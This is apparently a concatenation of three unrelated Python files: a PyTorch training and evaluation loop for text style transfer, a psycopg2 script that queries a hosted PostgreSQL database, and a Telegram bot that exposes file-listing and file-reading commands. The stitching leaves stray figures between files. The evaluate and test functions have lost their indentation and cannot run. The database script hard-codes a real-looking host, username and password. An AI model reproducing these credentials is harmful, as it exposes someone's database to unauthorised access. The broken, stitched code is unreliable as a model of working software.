            [os.path.join(self.args.data_dir, f"self_ref.test.{i}")] for i in range(2)
        ]
    print("self.dev_data_path_list is")
    print(self.dev_data_path_list)
    print("self.test_data_path_list is")
    print(self.test_data_path_list)
def get_optimizer(self, params=None):
    """Build the optimizer and LR schedule over an explicit parameter list.

    Unlike the base class, the caller supplies *params* (the trainable
    subset); returns (None, None) when nothing is given. Side effect:
    stores the optimizer-step count in args.num_steps.
    """
    args = self.args
    if params is None:
        print("return because params is None")
        return None, None
    # params = self.model.parameters()
    optimizer = optimization.get_optim(args, params)
    steps_per_epoch = len(self.train_dataloader)
    # Optimizer steps, accounting for gradient accumulation.
    num_steps = steps_per_epoch * args.num_train_epochs // args.grad_accum_interval
    args.num_steps = num_steps
    print("Total number of steps: %d" % num_steps)
    decay_step = steps_per_epoch * args.decay_epoch
    if args.decay_epoch <= 0:
        # Constant LR for the whole run.
        return optimizer, optimization.get_constant_schedule(optimizer)
    print("Step when lr starts to decay: %d" % decay_step)
    scheduler = optimization.get_constant_schedule_with_linear_decay(
        optimizer, decay_step=decay_step, num_training_steps=num_steps
    )
    return optimizer, scheduler
def train(self, train_dataloader=None):
    """Main training loop with gradient accumulation.

    Each batch is sorted by decreasing length, fed to the model, and the
    weighted sum of reconstruction / back-translation / classifier /
    content losses is accumulated; an optimizer step runs every
    args.grad_accum_interval batches. Periodically logs, evaluates on
    dev, and saves checkpoints; a final eval + checkpoint happens after
    the loop. Returns (loss record, (dev metrics, their global steps)).
    """
    print("\n### TRAINING BEGINS ###")
    args = self.args
    model = self.model
    optimizer = self.optimizer
    scheduler = self.scheduler
    # Fall back to the dataloader built at construction time.
    train_dataloader = train_dataloader if train_dataloader else self.train_dataloader
    model.train()
    loss_record = []  # loss at global_step 0, 1, 2 ...
    dev_metric_record = []
    global_step_record_for_eval = []
    global_step = 0
    pad_id = args.pad_id
    grad_accum_interval = args.grad_accum_interval
    log_loss = 0.0
    num_iters_per_epoch = len(train_dataloader)
    # Average the loss over the number of batches per optimizer step.
    normalizer = min(num_iters_per_epoch, grad_accum_interval)
    cls_w = args.cls_weight
    print("cls_w is", cls_w)
    if self.use_caw_schedule:
        # Ramp ca_w linearly from 0 to args.ca_weight over the first half
        # of training (see lambda_schedule).
        start = 0.0
        stop = args.ca_weight
        ratio = 0.5
        ca_w_list = lambda_schedule(args.num_steps,
                                    start=start, stop=stop, ratio=ratio)
        print(f"ca_w uses schedule (start={start}, stop={stop}, ratio={ratio})")
        ca_w = ca_w_list[0]
    else:
        ca_w = args.ca_weight
    print("ca_w is", ca_w)
    bt_w = args.bt_weight
    print("bt_w is", bt_w)
    model.zero_grad()
    if args.freeze_emb_at_beginning:
        model.freeze_emb()
    start_time = time.time()
    for ep in range(args.num_train_epochs):
        # Optionally unfreeze the embeddings after a warm-up epoch count.
        if ep == args.unfreeze_at_ep and args.freeze_emb_at_beginning:
            model.unfreeze_emb()
        for step, batch in enumerate(train_dataloader):
            src, lab, src_len = batch
            # print(f"ep:{ep}, step: {step}, src.shape[1] is", src.shape[1])
            # Sort the batch by decreasing length before the forward pass
            # (NOTE(review): presumably required by packed RNN sequences
            # inside the model -- confirm against the model code).
            sorted_src_len, indices = torch.sort(src_len, dim=0, descending=True)
            sorted_src = torch.index_select(src, dim=0, index=indices)
            sorted_lab = torch.index_select(lab, dim=0, index=indices)
            sorted_src = sorted_src.to(args.device)
            sorted_src_len = sorted_src_len.to(args.device)
            sorted_lab = sorted_lab.to(args.device)
            try:
                sorted_src_pad_mask = sorted_src==pad_id
                sorted_loss_tuple, sorted_output_tuple,\
                    sorted_algin = model(sorted_src, sorted_src_len,
                                         sorted_lab, sorted_src_pad_mask)
                sorted_rec_loss, sorted_bt_loss,\
                    sorted_src_cls_loss, sorted_soft_out_cls_loss,\
                    sorted_out_cls_loss, sorted_ca_loss = sorted_loss_tuple
                sorted_output, sorted_output_len = sorted_output_tuple
                # Per-sample losses -> batch means.
                rec_loss = sorted_rec_loss.mean()
                bt_loss = sorted_bt_loss.mean()
                src_cls_loss = sorted_src_cls_loss.mean()
                soft_out_cls_loss = sorted_soft_out_cls_loss.mean()
                out_cls_loss = sorted_out_cls_loss.mean()
                ca_loss = sorted_ca_loss.mean()
                # Weighted total; src_cls_loss and out_cls_loss are
                # logged but not optimized.
                loss = rec_loss + bt_w * bt_loss\
                    + cls_w * soft_out_cls_loss + ca_w * ca_loss
                loss /= normalizer
                loss.backward()
                # Optimizer step every grad_accum_interval batches (or at
                # epoch end when the interval exceeds the epoch length).
                if (step+1) % grad_accum_interval == 0 or\
                        (grad_accum_interval >= num_iters_per_epoch and
                         (step+1) == num_iters_per_epoch):
                    g = clip_grad_norm(model.parameters(), args.max_grad_norm)
                    optimizer.step()
                    scheduler.step()
                    model.zero_grad()
                    loss_record.append(log_loss)
                    # global_step += 1
                    log_loss = 0.0
                    if global_step > 0 and global_step % args.log_interval == 0:
                        print(
                            f"epoch: {ep} "\
                            f"step: {global_step} "\
                            f"loss: {loss.item() * normalizer:.4f} "\
                            f"rec_loss: {rec_loss.item():.4f} "\
                            f"bt_loss: {bt_loss.item():.4f} "\
                            f"src_cls_loss: {src_cls_loss.item():.4f} "\
                            f"soft_out_cls_loss: {soft_out_cls_loss.item():.4f} "\
                            f"out_cls_loss: {out_cls_loss.item():.4f} "\
                            f"ca_loss: {ca_loss.item():.4f} "\
                            f"||g||: {g:.2f} "\
                            f"ca_w: {ca_w:.4f} "\
                            f"time: {misc.timeBetween(start_time, time.time())}"
                        )
                    if global_step > 0 and global_step % args.eval_interval == 0:
                        # Periodic dev evaluation; checkpoints go into a
                        # per-step subdirectory (output_dir is temporarily
                        # redirected because evaluate() writes there).
                        print("\neval model at step: %d" % global_step)
                        checkpoint_output_dir = os.path.join(args.output_dir, "checkpoint-%d" % global_step)
                        if not os.path.exists(checkpoint_output_dir):
                            os.mkdir(checkpoint_output_dir)
                        org_output_dir = args.output_dir
                        args.output_dir = checkpoint_output_dir
                        print("dev")
                        dev_metric = self.evaluate()
                        dev_metric_record.append(dev_metric)
                        global_step_record_for_eval.append(global_step)
                        args.output_dir = org_output_dir
                        print("Save checkpoint at %s" % checkpoint_output_dir)
                        self.save_checkpoint(checkpoint_output_dir)
                        model.train()
                    global_step += 1
                    if self.use_caw_schedule:
                        # NOTE(review): ca_w_list[global_step] can raise
                        # IndexError on the final step once global_step
                        # reaches args.num_steps -- verify.
                        ca_w = ca_w_list[global_step]
                else:
                    # Not an optimizer step: accumulate the loss for logging.
                    log_loss += loss.item()
            except RuntimeError as e:
                if 'out of memory' in str(e):
                    print('|| WARNING: ran out of memory ||\n')
                    if hasattr(torch.cuda, 'empty_cache'):
                        torch.cuda.empty_cache()
                else:
                    print('|| WARNING: fail to train ||\n')
                    raise e
                # NOTE(review): this unconditional re-raise also fires in
                # the OOM branch, so training aborts on OOM despite the
                # cache clearing above -- confirm this is intended.
                raise e
    # gpu_profile(frame=sys._getframe(), event='line', arg=None)
    print("### TRAINING ENDS ###\n")
    # Final evaluation + checkpoint after the last step.
    print("\neval model at step: %d" % global_step)
    checkpoint_output_dir = os.path.join(args.output_dir, "checkpoint-%d" % global_step)
    if not os.path.exists(checkpoint_output_dir):
        os.mkdir(checkpoint_output_dir)
    org_output_dir = args.output_dir
    args.output_dir = checkpoint_output_dir
    print("dev")
    dev_metric = self.evaluate()
    dev_metric_record.append(dev_metric)
    global_step_record_for_eval.append(global_step)
    args.output_dir = org_output_dir
    print("Save checkpoint at %s" % checkpoint_output_dir)
    self.save_checkpoint(checkpoint_output_dir)
    train_record = loss_record
    eval_record = (dev_metric_record, global_step_record_for_eval)
    # Persist raw records alongside the plots.
    with open(os.path.join(args.output_dir, "record.pt"), "wb") as f:
        pickle.dump({"train": train_record, "eval": eval_record}, f)
    self.save_train_result(train_record, eval_record)
    return train_record, eval_record
def evaluate(self, eval_dataloader=None, data_path_list=None, ref_path_list=None, data_name="dev"):
eval_dataloader = eval_dataloader if eval_dataloader else self.dev_dataloader
ref_path_list = ref_path_list if ref_path_list else self.dev_ref_path_list
data_path_list = data_path_list if data_path_list else self.dev_data_path_list
args = self.args
model = self.model
tokenizer = self.tokenizer
clf_model = self.clf_model
model.eval()
num_data = 0
total_loss = 0
total_rec_loss = 0
total_bt_loss = 0
total_src_cls_loss = 0
total_soft_out_cls_loss = 0
total_out_cls_loss = 0
total_ca_loss = 0
outputs_list = []
outputs_len_list = []
lab_list = []
clf_preds_list = []
cls_w = args.cls_weight
ca_w = args.ca_weight
bt_w = args.bt_weight
pad_id = args.pad_id
start_time = time.time()
with torch.no_grad():
for step, batch in enumerate(eval_dataloader):
src, lab, src_len = batch
num_data += src.shape[0]
# print(f"ep:{ep}, step: {step}, src.shape[1] is", src.shape[1])
sorted_src_len, indices = torch.sort(src_len, dim=0, descending=True)
_, resorted_indices = torch.sort(indices, dim=0)
sorted_src = torch.index_select(src, dim=0, index=indices)
sorted_lab = torch.index_select(lab, dim=0, index=indices)
sorted_src = sorted_src.to(args.device)
sorted_src_len = sorted_src_len.to(args.device)
sorted_lab = sorted_lab.to(args.device)
resorted_indices = resorted_indices.to(args.device)
try:
sorted_src_pad_mask = sorted_src==pad_id
sorted_loss_tuple, sorted_outputs_tuple,\
sorted_algin = model(sorted_src, sorted_src_len,
sorted_lab, sorted_src_pad_mask)
sorted_rec_loss, sorted_bt_loss,\
sorted_src_cls_loss, sorted_soft_out_cls_loss,\
sorted_out_cls_loss, sorted_ca_loss = sorted_loss_tuple
sorted_outputs, sorted_outputs_len = sorted_outputs_tuple
# shape of sorted_outputs is [batch_size, max_len]
outputs = torch.index_select(sorted_outputs, dim=0, index=resorted_indices)
outputs_len = torch.index_select(sorted_outputs_len, dim=0, index=resorted_indices)
clf_preds = torch.argmax(clf_model(outputs), dim=-1)
rec_loss = sorted_rec_loss.sum()
bt_loss = sorted_bt_loss.sum()
src_cls_loss = sorted_src_cls_loss.sum()
soft_out_cls_loss = sorted_soft_out_cls_loss.sum()
out_cls_loss = sorted_out_cls_loss.sum()
ca_loss = sorted_ca_loss.sum()
loss = rec_loss + bt_w * bt_loss\
+ cls_w * soft_out_cls_loss + ca_w * ca_loss
total_rec_loss += rec_loss.item()
total_bt_loss += bt_loss.item()
total_src_cls_loss += src_cls_loss.item()
total_soft_out_cls_loss += soft_out_cls_loss.item()
total_out_cls_loss += out_cls_loss.item()
total_ca_loss += ca_loss.item()
total_loss += loss.item()
outputs_list.extend(
[x.squeeze(0) for x in torch.split(outputs, split_size_or_sections=1, dim=0)]
)
outputs_len_list.extend(
[x.squeeze(0) for x in torch.split(outputs_len, split_size_or_sections=1, dim=0)]
)
lab_list.extend(
[x.squeeze(0) for x in torch.split(lab, split_size_or_sections=1, dim=0)]
)
clf_preds_list.extend(
[x.squeeze(0).item() for x in torch.split(clf_preds, split_size_or_sections=1, dim=0)]
)
except RuntimeError as e:
if 'out of memory' in str(e):
print('|| WARNING: ran out of memory ||\n')
if hasattr(torch.cuda, 'empty_cache'):
torch.cuda.empty_cache()
else:
print('|| WARNING: fail to train ||\n')
raise e
eval_loss = total_loss / num_data
eval_rec_loss = total_rec_loss / num_data
eval_bt_loss = total_bt_loss / num_data
eval_src_cls_loss = total_src_cls_loss / num_data
eval_soft_out_cls_loss = total_soft_out_cls_loss / num_data
eval_out_cls_loss = total_out_cls_loss / num_data
eval_ca_loss = total_ca_loss / num_data
inv_lab_list = 1-np.array(lab_list)
# print("clf_preds_list is")
# print(clf_preds_list)
eval_acc = accuracy_score(inv_lab_list, np.array(clf_preds_list)) * 100.0
transfer_file_names = [
os.path.join(args.output_dir, f"{data_name}.0.tsf"),
os.path.join(args.output_dir, f"{data_name}.1.tsf")
]
transfer_files = [
open(transfer_file_names[0], 'w'),
open(transfer_file_names[1], 'w')
]
count = 0
# print(f"len(outputs_list): {len(outputs_list)}, len(outputs_len_list): {len(outputs_len_list)}")
for output, output_len, l in zip(outputs_list, outputs_len_list, lab_list):
# print("output is", output)
text = tokenizer.decode(output, include_sos_eos=False)
if output_len < args.max_decoding_len:
pass
if args.use_bpe:
text = text.replace("@@ ", "")
text = text.strip("@@")
transfer_files[l].write(text+'\n')
count += 1
transfer_files[0].close()
transfer_files[1].close()
try:
assert count == num_data
except:
print(f"count: {count}, total_num: {num_data}")
raise RuntimeError()
bleu_evaluator = BLEUEvaluator()
if ref_path_list is not None:
bleu_score_021 = bleu_evaluator.score(ref_path_list[0], transfer_file_names[0])
bleu_score_120 = bleu_evaluator.score(ref_path_list[1], transfer_file_names[1])
bleu_score = (bleu_score_021 + bleu_score_120) / 2
else:
bleu_score = None
if data_path_list is not None:
self_bleu_score_021 = bleu_evaluator.score(data_path_list[0], transfer_file_names[0])
self_bleu_score_120 = bleu_evaluator.score(data_path_list[1], transfer_file_names[1])
self_bleu_score = (self_bleu_score_021 + self_bleu_score_120) / 2
else:
self_bleu_score = None
print("==============================")
if ref_path_list is not None:
print(
f"BLEU: {bleu_score:.4f} "\
f"(0->1:{bleu_score_021:.4f}, 1->0:{bleu_score_120:.4f}) ",
end='',
)
if data_path_list is not None:
print(
f"self-BLEU: {self_bleu_score:.4f} "\
f"(0->1:{self_bleu_score_021:.4f}, 1->0:{self_bleu_score_120:.4f}) ",
end='',
)
print(
f"acc: {eval_acc:.4f}\n"\
f"loss: {eval_loss:.4f} "\
f"rec_loss: {eval_rec_loss:.4f} "\
f"bt_loss: {eval_bt_loss:.4f} "\
f"src_cls_loss: {eval_src_cls_loss:.4f} "\
f"soft_out_cls_loss: {eval_soft_out_cls_loss:.4f} "\
f"out_cls_loss: {eval_out_cls_loss:.4f} "\
f"ca_loss: {eval_ca_loss:.4f} "\
f"time: {misc.timeBetween(start_time, time.time())}"
)
print("==============================\n")
return (bleu_score, self_bleu_score, eval_acc)
def test(self, test_dataloader=None, data_path_list=None, ref_path_list=None):
test_dataloader = test_dataloader if test_dataloader else self.test_dataloader
ref_path_list = ref_path_list if ref_path_list else self.test_ref_path_list
data_path_list = data_path_list if data_path_list else self.test_data_path_list
return self.evaluate(test_dataloader, data_path_list, ref_path_list, "test")
    def save_train_result(self, train_record, eval_record):
        """Plot dev metrics and the training-loss curve into args.output_dir.

        Writes two PDFs: ``bleu_and_acc.pdf`` (dev BLEU / self-BLEU on the
        left axis, dev accuracy on a twinned right axis, against global step)
        and ``loss.pdf`` (per-step training loss).

        Args:
            train_record: sequence of per-step training losses.
            eval_record: ``(dev_metric_record, eval_gs_record)`` where each
                dev metric is a ``(bleu, self_bleu, acc)`` tuple and
                ``eval_gs_record`` holds the matching global steps.
        """
        args = self.args
        train_loss_record = train_record
        dev_metric_record, eval_gs_record = eval_record
        # Transpose [(bleu, self_bleu, acc), ...] into three parallel arrays.
        dev_unzip = list(zip(*dev_metric_record))
        dev_bleu_record, dev_self_bleu_record, dev_acc_record = np.array(dev_unzip[0]),\
            np.array(dev_unzip[1]), np.array(dev_unzip[2])
        # Elementwise numpy comparison against None: True for every entry
        # only when each evaluation actually produced a BLEU score
        # (i.e. reference files were available throughout).
        if (dev_bleu_record!=None).all():
            best_dev_bleu = np.max(dev_bleu_record)
            step_of_best_dev_bleu = eval_gs_record[np.argmax(dev_bleu_record)]
            print("best dev BLEU: %.4f in step %d" % (best_dev_bleu, step_of_best_dev_bleu))
        fig = plt.figure()
        ax_1 = fig.add_subplot(111)
        # Second y-axis sharing the same x-axis, so BLEU and accuracy can use
        # independent scales on one plot.
        ax_2 = ax_1.twinx()
        ax_1.set_xlabel("step")
        ax_1.set_ylabel("(self-)BLEU")
        ax_2.set_ylabel("Acc")
        # Lines and labels are collected manually so one legend can cover
        # artists from both axes.
        line_list = []
        line_label_list = []
        if (dev_bleu_record!=None).all():
            # l, = ax_1.plot(eval_gs_record, dev_bleu_record, '-', c='#1f77b4', label="dev BLEU")
            l, = ax_1.plot(eval_gs_record, dev_bleu_record, '-', c='#1f77b4')
            line_list.append(l)
            line_label_list.append("dev BLEU")
        # l, = ax_1.plot(eval_gs_record, dev_self_bleu_record, ':', c='#1f77b4', label="dev self-BLEU")
        l, = ax_1.plot(eval_gs_record, dev_self_bleu_record, ':', c='#1f77b4')
        line_list.append(l)
        line_label_list.append("dev self-BLEU")
        # l, = ax_2.plot(eval_gs_record, dev_acc_record, '--', c='#1f77b4', label="dev acc")
        l, = ax_2.plot(eval_gs_record, dev_acc_record, '--', c='#1f77b4')
        line_list.append(l)
        line_label_list.append("dev acc")
        plt.legend(line_list, line_label_list)
        plt.tight_layout()
        plt.savefig(os.path.join(args.output_dir, "bleu_and_acc.pdf"), format='pdf') # bbox_inches='tight'
        plt.close()
        plt.figure()
        plt.xlabel("step")
        plt.ylabel("loss")
        plt.plot(list(range(len(train_loss_record))), train_loss_record)
        # plt.plot(eval_gs_record, eval_loss_record)
        plt.tight_layout()
        plt.savefig(os.path.join(args.output_dir, "loss.pdf"), format='pdf')
        plt.close()
| 30,022 | 9,673 |
import psycopg2
# import sqlite3

# SECURITY(review): database credentials are hard-coded in source. Move them
# to environment variables or a secrets store before sharing/deploying, and
# rotate this password — it must be considered compromised.
DB_NAME = "ekasuicm"
DB_USER = "ekasuicm"
DB_PASSWORD = "5xL04dTyJuqjmPNeDPWsHjZsCnMmqpbM"
DB_HOST = "ruby.db.elephantsql.com"

connection = psycopg2.connect(dbname=DB_NAME, user=DB_USER,
                              password=DB_PASSWORD, host=DB_HOST)
print("CONNECTION", type(connection))
try:
    cursor = connection.cursor()
    print("CURSOR", type(cursor))
    cursor.execute('SELECT * from titanic_data;')
    result = cursor.fetchall()
    # Bug fix: the original used Python 2 `print result` statements (a
    # SyntaxError on Python 3) and printed the ENTIRE result set on every
    # loop iteration instead of the current row.
    for row in result:
        print(row)
    print(result[0])
    print(result[1])
finally:
    # The original leaked the connection; always release it.
    connection.close()
| 561 | 225 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import logging
logging.basicConfig(level=logging.DEBUG,
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
logger = logging.getLogger(__name__)
from telegram import Updater
from commands import history, cat, cd, get, ls, pwd, save
from settings import ACCESS_LIST, BOT_TOCKEN
from utils import on_error_decorator
@on_error_decorator
def on_ls(bot, update):
    """Handle /ls: send the directory listing for the given path."""
    message = update.message
    listing = ls(message.from_user['username'], message.text[3:].strip())
    bot.sendMessage(message.chat_id, text='<pre>%s</pre>' % listing, parse_mode='HTML')
@on_error_decorator
def on_start(bot, update):
    """Handle /start: refuse users outside ACCESS_LIST, otherwise reply
    with the user's current working directory.

    Bug fix: the original referenced `user` without ever defining it, so
    every *authorized* user triggered a NameError.
    """
    user = update.message.from_user['username']
    if user not in ACCESS_LIST:
        bot.sendMessage(update.message.chat_id, text='<b>Я не твоя мамочка!</b>', parse_mode='HTML')
    else:
        bot.sendMessage(update.message.chat_id, text=pwd(user))
def on_error(_, update, error):
    """Log errors reported by the dispatcher for a given update."""
    # logger.warn is a deprecated alias of warning(); also pass lazy %-args
    # instead of pre-formatting the message.
    logger.warning('Update "%s" caused error "%s"', update, error)
@on_error_decorator
def on_cd(bot, update):
    """Handle /cd: change the user's working directory and echo the result."""
    msg = update.message
    target = msg.text[3:].strip()
    username = msg.from_user['username']
    reply = cd(username, target)
    bot.sendMessage(msg.chat_id, text='<pre>%s</pre>' % reply, parse_mode='HTML')
@on_error_decorator
def on_get(bot, update):
    """Handle /get: send the requested file with the media-appropriate method.

    Bug fix: the original used ``dict.get(f_type, bot.sendDocument(...))``,
    which evaluates the fallback EAGERLY — the document was sent on every
    call regardless of type, and sendDocument's return value was then
    invoked like a function, crashing afterwards.
    """
    path = update.message.text[4:].strip()
    user = update.message.from_user['username']
    f, f_type = get(user, path)
    chat_id = update.message.chat_id
    sender = {'video': bot.sendVideo,
              'audio': bot.sendAudio,
              'image': bot.sendPhoto}.get(f_type)
    if sender is not None:
        sender(chat_id, f)
    else:
        # Generic fallback keeps the original filename for the recipient.
        bot.sendDocument(chat_id, f, filename=path)
@on_error_decorator
def on_pwd(bot, update):
    """Handle /pwd: report the user's current working directory."""
    message = update.message
    username = message.from_user['username']
    bot.sendMessage(message.chat_id, text=pwd(username))
@on_error_decorator
def on_history(bot, update):
    """Handle /history: send the user's command history."""
    message = update.message
    bot.sendMessage(message.chat_id, text=history(message.from_user['username']))
@on_error_decorator
def on_message(bot, update):
    """Persist a document attached to an incoming message and confirm."""
    message = update.message
    # Ignore messages without an attached document.
    if not hasattr(message, 'document'):
        return
    document = message.document
    confirmation = save(message.from_user['username'],
                        bot.getFile(document.file_id),
                        document.file_name)
    bot.sendMessage(message.chat_id, text=confirmation)
@on_error_decorator
def on_cat(bot, update):
    """Handle /cat: send a file's contents wrapped in <pre> tags."""
    msg = update.message
    username = msg.from_user['username']
    contents = cat(username, msg.text[4:].strip())
    bot.sendMessage(msg.chat_id, text='<pre>%s</pre>' % contents, parse_mode='HTML')
def run_bot():
    """Register all handlers with the dispatcher and poll until interrupted."""
    updater = Updater(BOT_TOCKEN)
    dispatcher = updater.dispatcher
    dispatcher.addErrorHandler(on_error)
    # Table-driven registration; order matches the original wiring.
    command_handlers = (
        ("start", on_start),
        ("ls", on_ls),
        ("cd", on_cd),
        ("get", on_get),
        ("cat", on_cat),
        ("pwd", on_pwd),
        ("history", on_history),
    )
    for command, handler in command_handlers:
        dispatcher.addTelegramCommandHandler(command, handler)
    dispatcher.addTelegramMessageHandler(on_message)
    updater.start_polling()
    updater.idle()
# Start the bot only when executed as a script, not when imported.
if __name__ == '__main__':
    run_bot()
| 3,414 | 1,136 |